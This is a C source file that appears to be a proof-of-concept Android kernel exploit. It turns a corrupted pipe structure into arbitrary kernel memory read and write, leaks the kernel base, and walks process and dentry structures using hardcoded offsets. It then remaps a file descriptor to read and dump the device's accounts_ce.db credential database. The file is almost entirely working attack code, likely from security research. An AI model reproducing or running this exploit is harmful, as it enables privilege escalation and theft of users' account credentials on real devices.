#include "common.h"

static struct shared_page shared_page;
static struct known_file_pipe known_file_pipe;

struct pipe_buffer {
  /*struct page * */unsigned long page;
  unsigned int offset, len;
  /*struct pipe_buf_operations * */unsigned long ops;
  unsigned int flags;
  unsigned long private;
};

struct pipe_inode_info {
  union {
    struct {
      unsigned long counter;
      unsigned int wait_lock;
      int osq;
      void *next;
      void *prev;
    } mutex;
    struct {
      unsigned long pad1;
      unsigned long backlink;
    };
  };
  struct {
    unsigned int lock;
    unsigned int pad2;
    void *next;
    void *prev;
  } wait;
  unsigned int nrbufs, curbuf, buffers; // 0, 0, 1
  unsigned int readers; // 1
  unsigned int writers; // 1
  unsigned int files;
  unsigned int waiting_writers;
  unsigned int r_counter;
  unsigned int w_counter;
  struct page *tmp_page;
  void *fasync_readers;
  void *fasync_writers;
  struct pipe_buffer *bufs;
  void *user;
};

struct shared_page_contents {
  struct pipe_inode_info info;
  struct pipe_buffer buf;
};

static struct shared_page_contents *shared_page_user;
static struct shared_page_contents *shared_page_kernel;

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ? 16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

static unsigned long virt_to_page(unsigned long kaddr) {
  #define SIZEOF_STRUCT_PAGE 0x40UL
  #define VMEMMAP_SIZE (1UL << (39 - 12 - 1 + 6)) // 0x100000000
  #define VMEMMAP_START (PAGE_OFFSET - VMEMMAP_SIZE)

  unsigned long phys_addr = kaddr - PAGE_OFFSET;
  unsigned long phys_page = phys_addr / 0x1000;
  return phys_page * SIZEOF_STRUCT_PAGE + VMEMMAP_START;
}

static void set_pipe_buffer(unsigned long kaddr) {
  shared_page_user->buf.page = virt_to_page(kaddr);
  shared_page_user->buf.offset = kaddr & 0xfffUL;
}

/* address must be in the physmap */
static void peek_physmap_buf(unsigned long kaddr, void *buf, int len) {
  set_pipe_buffer(kaddr);
  shared_page_user->buf.len = len + 1;
  assert(SYSCHK(read(known_file_pipe.bipipe_fd, buf, len)) == len);
}
static unsigned long peek_physmap_ulong(unsigned long kaddr) {
  unsigned long res;
  peek_physmap_buf(kaddr, &res, 8);
  return res;
}
static unsigned int peek_physmap_uint(unsigned long kaddr) {
  unsigned int res;
  peek_physmap_buf(kaddr, &res, 4);
  return res;
}
static void poke_physmap_buf(unsigned long kaddr, void *buf, int len) {
  set_pipe_buffer(kaddr);
  shared_page_user->buf.len = 0;
  assert(SYSCHK(write(known_file_pipe.bipipe_fd, buf, len)) == len);
}
static void poke_physmap_ulong(unsigned long kaddr, unsigned long value) {
  poke_physmap_buf(kaddr, &value, sizeof(value));
}
static void poke_physmap_uint(unsigned long kaddr, unsigned int value) {
  poke_physmap_buf(kaddr, &value, sizeof(value));
}

static unsigned long signalfd_arb_read_ptr;
static int sigfdinfo = -1;
static unsigned long peek_any_ulong(unsigned long kaddr) {
  char buf[100];
  poke_physmap_ulong(signalfd_arb_read_ptr, kaddr);
  int len = SYSCHK(pread(sigfdinfo, buf, sizeof(buf)-1, 0));
  buf[len] = 0;
  char *p = strstr(buf, "sigmask:\t");
  assert(p);
  p += 9;
  return ~strtoul(p, NULL, 16);
}

#define ADDR_anon_pipe_buf_ops 0x0C217F0UL
#define ADDR_runqueues         0x16B6F00UL
#define ADDR_dentry_hashtable  0x199BD08UL
#define ADDR_d_hash_shift      0x199BD10UL

#define OFFSET_DENTRY_D_HASH 0x8UL
#define OFFSET_DENTRY_D_PARENT 0x18UL
#define OFFSET_DENTRY_D_NAME_LEN 0x24UL
#define OFFSET_DENTRY_D_INODE 0x30UL
#define OFFSET_DENTRY_D_INAME 0x38UL
#define OFFSET_FDTABLE_FD 0x8UL
#define OFFSET_FILE_DENTRY 0x18UL
#define OFFSET_FILE_OWNER_PID 0x78UL
#define OFFSET_FILE_PRIVATE_DATA 0xC8UL
#define OFFSET_FILE_MAPPING 0xF0UL
#define OFFSET_FILES_REFCOUNT 0x0UL
#define OFFSET_FILES_STRUCT_FDT 0x20UL
#define OFFSET_INODE_MAPPING 0x30UL
#define OFFSET_PID_TASKS 0x8UL
#define OFFSET_TASK_PIDS 0x668UL
#define OFFSET_TASK_FILES 0x7d0UL

#define DNAME_INLINE_LEN 32

#define bytemask_from_count(cnt)  (~(~0ul << (cnt)*8))
static inline __u64 rol64(__u64 word, unsigned int shift)
{
  return (word << shift) | (word >> (64 - shift));
}
#define HASH_MIX(x, y, a) \
  ( x ^= (a), \
  y ^= x, x = rol64(x,12),\
  x += y, y = rol64(y,45),\
  y *= 9      )
#define GOLDEN_RATIO_64 0x61C8864680B583EBull
static inline unsigned int fold_hash(unsigned long x, unsigned long y)
{
  y ^= x * GOLDEN_RATIO_64;
  y *= GOLDEN_RATIO_64;
  return y >> 32;
}
static unsigned int full_name_hash(unsigned long base_dentry, const char *name) {
  unsigned long a, x = 0, y = base_dentry;
  unsigned int len = strlen(name);

  for (;;) {
    if (!len)
      goto done;
    a = *(unsigned long *)(name);
    if (len < sizeof(unsigned long))
      break;
    HASH_MIX(x, y, a);
    name += sizeof(unsigned long);
    len -= sizeof(unsigned long);
  }
  x ^= a & bytemask_from_count(len);
done:
  return fold_hash(x, y);
}

static unsigned long kernel_base;
static unsigned long d_hash_shift;
static unsigned long dentry_hashtable;

static unsigned long dentry_lookup(unsigned long parent, const char *name) {
  unsigned int hash = full_name_hash(parent, name);
  printf("hash('.../%s') = 0x%x\n", name, hash);
  unsigned long child = 0;
  unsigned long dentry = (peek_any_ulong(dentry_hashtable + 8 * (hash >> (32 - d_hash_shift))) & ~1UL) - OFFSET_DENTRY_D_HASH;
  printf("first dentry in hash bucket: 0x%lx\n", dentry);
  while (dentry + OFFSET_DENTRY_D_HASH) {
    unsigned long local_parent = peek_physmap_ulong(dentry + OFFSET_DENTRY_D_PARENT);
    if (local_parent == parent) {
      printf("  parent matches\n");
      char iname[DNAME_INLINE_LEN];
      unsigned int name_len = peek_physmap_uint(dentry + OFFSET_DENTRY_D_NAME_LEN);
      printf("  name_len = %d\n", name_len);
      if (name_len >= DNAME_INLINE_LEN-1) {
        printf("  name_len TOO BIG!\n");
      } else {
        peek_physmap_buf(dentry + OFFSET_DENTRY_D_INAME, iname, DNAME_INLINE_LEN);
        printf("  name: '%s'\n", iname);
        if (strcmp(iname, name) == 0) {
          child = dentry;
        }
      }
    }
    dentry = (peek_physmap_ulong(dentry + OFFSET_DENTRY_D_HASH) & ~1UL) - OFFSET_DENTRY_D_HASH;
    printf("next dentry in hash bucket: 0x%lx\n", dentry);
  }
  printf("dentry('.../%s') = 0x%lx\n", name, child);
  return child;
}

struct unlink_pair prepare_unlink(void) {
  printf("locating shared page...\n");
  shared_page = allocate_shared_page();
  printf("shared page: user_mapping=%p, kernel_mapping=0x%lx\n", shared_page.user_mapping, shared_page.kernel_mapping);
  shared_page_user = (void*)shared_page.user_mapping;
  shared_page_kernel = (void*)shared_page.kernel_mapping;

  printf("allocating pipe with known file pointer...\n");
  known_file_pipe = allocate_known_file_pipe();

  return (struct unlink_pair) {
    .next = shared_page.kernel_mapping,
    .pprev = known_file_pipe.file_kaddr + OFFSET_FILE_PRIVATE_DATA
  };
}

void arbitrary_rw_demo(void) {
  printf("pipe should be buggered, verifying...\n");
  printf("backlink: 0x%lx\n", shared_page_user->info.backlink);
  if (shared_page_user->info.backlink == 0) {
    while (1) pause();
  }

  sigset_t signalfd_mask;
  sigemptyset(&signalfd_mask);
  int sigfd = SYSCHK(signalfd(-1, &signalfd_mask, SFD_CLOEXEC));
  sigfdinfo = SYSCHK(open(tprintf("/proc/self/fdinfo/%d", sigfd), O_RDONLY|O_CLOEXEC));
  int system_ce_path_fd = SYSCHK(open("/data/system_ce", O_PATH|O_CLOEXEC));
  int hollow_fd = SYSCHK(open("/system/bin/sh", O_RDONLY));

  printf("resetting pipe...\n");
  shared_page_user->info.mutex.counter = 0;
  shared_page_user->info.mutex.wait_lock = 0;
  shared_page_user->info.mutex.osq = 0;
  shared_page_user->info.mutex.next = &shared_page_kernel->info.mutex.next;
  shared_page_user->info.mutex.prev = &shared_page_kernel->info.mutex.next;
  shared_page_user->info.wait.next = &shared_page_kernel->info.wait.next;
  shared_page_user->info.wait.prev = &shared_page_kernel->info.wait.next;
  shared_page_user->info.buffers = 1;
  shared_page_user->info.readers = 1;
  shared_page_user->info.writers = 1;
  shared_page_user->info.files = 1000;
  shared_page_user->info.bufs = &shared_page_kernel->buf;
  printf("pipe reset.\n");

  printf("dumping pipe state:\n");
  hexdump(&shared_page_user->info, sizeof(shared_page_user->info));

  assert(SYSCHK(write(known_file_pipe.bipipe_fd, "X", 1)) == 1);
  printf("pipe written.\n");

  printf("dumping pipe state:\n");
  hexdump(&shared_page_user->info, sizeof(shared_page_user->info));

  printf("dumping pipe buffer state:\n");
  printf("page = 0x%lx\n", shared_page_user->buf.page);
  printf("offset = 0x%x\n", shared_page_user->buf.offset);
  printf("len = 0x%x\n", shared_page_user->buf.len);
  printf("ops = 0x%lx\n", shared_page_user->buf.ops);
  printf("flags = 0x%x\n", shared_page_user->buf.flags);
  printf("private = 0x%lx\n", shared_page_user->buf.private);
  kernel_base = shared_page_user->buf.ops - ADDR_anon_pipe_buf_ops;
  printf("=> kernel_base = 0x%lx\n", kernel_base);

#ifdef PIXEL_DEBUG
  printf("PAUSING HERE; rest won't work with PIXEL_DEBUG\n");
  while (1) pause();
#endif

  SYSCHK(fcntl(known_file_pipe.bipipe_fd, F_SETOWN, getpid()));
  unsigned long current_pid = peek_physmap_ulong(known_file_pipe.file_kaddr + OFFSET_FILE_OWNER_PID);
  printf("current's pid struct: 0x%lx\n", current_pid);
  unsigned long current = peek_physmap_ulong(current_pid + OFFSET_PID_TASKS) - OFFSET_TASK_PIDS;
  printf("current: 0x%lx\n", current);
  unsigned long files = peek_physmap_ulong(current + OFFSET_TASK_FILES);
  poke_physmap_uint(files + OFFSET_FILES_REFCOUNT, 0x10000000L);
  printf("current->files: 0x%lx [now pinned]\n", files);
  unsigned long fdt = peek_physmap_ulong(files + OFFSET_FILES_STRUCT_FDT);
  printf("current->files->fdt: 0x%lx\n", fdt);
  unsigned long fd_array = peek_physmap_ulong(fdt + OFFSET_FDTABLE_FD);
  printf("current->files->fdt->fd: 0x%lx\n", fd_array);
  unsigned long signalfd_file = peek_physmap_ulong(fd_array + 8 * sigfd);
  printf("current->files->fdt->fd[sigfd]: 0x%lx\n", signalfd_file);
  unsigned long system_ce_path_file = peek_physmap_ulong(fd_array + 8 * system_ce_path_fd);
  printf("current->files->fdt->fd[system_ce_path_fd]: 0x%lx\n", system_ce_path_file);
  unsigned long hollow_file = peek_physmap_ulong(fd_array + 8 * hollow_fd);
  printf("current->files->fdt->fd[hollow_fd]: 0x%lx\n", hollow_file);
  signalfd_arb_read_ptr = signalfd_file + OFFSET_FILE_PRIVATE_DATA;
  unsigned long system_ce_dentry = peek_physmap_ulong(system_ce_path_file + OFFSET_FILE_DENTRY);
  printf("dentry(/data/system_ce): 0x%lx\n", system_ce_dentry);

  d_hash_shift = peek_any_ulong(kernel_base + ADDR_d_hash_shift) & 0xffffffffUL;
  printf("d_hash_shift = 0x%lx\n", d_hash_shift);
  dentry_hashtable = peek_any_ulong(kernel_base + ADDR_dentry_hashtable);

  unsigned long system_ce_0_dentry = dentry_lookup(system_ce_dentry, "0");
  unsigned long accounts_db_dentry = dentry_lookup(system_ce_0_dentry, "accounts_ce.db");
  unsigned long accounts_db_inode = peek_physmap_ulong(accounts_db_dentry + OFFSET_DENTRY_D_INODE);
  printf("inode('/data/system_ce/0/accounts_ce.db') = 0x%lx\n", accounts_db_inode);
  unsigned long accounts_db_mapping = peek_physmap_ulong(accounts_db_inode + OFFSET_INODE_MAPPING);
  printf("mapping('/data/system_ce/0/accounts_ce.db') = 0x%lx\n", accounts_db_mapping);
  poke_physmap_ulong(hollow_file + OFFSET_FILE_MAPPING, accounts_db_mapping);
  printf("hollow_file->f_mapping poked.\n");

  char accounts_header[0x1000];
  int len = SYSCHK(read(hollow_fd, accounts_header, 0x1000));
  printf("read %d bytes accounts header. dumping...\n", len);
  hexdump(accounts_header, len);
  sleep(1);

  printf("STRINGS:\n");
  SYSCHK(lseek(hollow_fd, 0, SEEK_SET));
  dup2(hollow_fd, 0);
  system("strings");
  sleep(1);
}
